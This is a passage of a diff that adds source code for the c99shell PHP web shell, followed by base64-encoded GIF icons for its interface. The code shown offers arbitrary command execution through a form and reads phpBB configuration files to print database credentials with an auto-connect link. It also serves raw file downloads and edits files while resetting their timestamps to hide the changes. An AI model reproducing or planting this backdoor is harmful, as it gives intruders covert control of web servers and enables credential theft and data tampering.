+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=\"hidden\" name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=\"submit\" name=\"submit\" value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
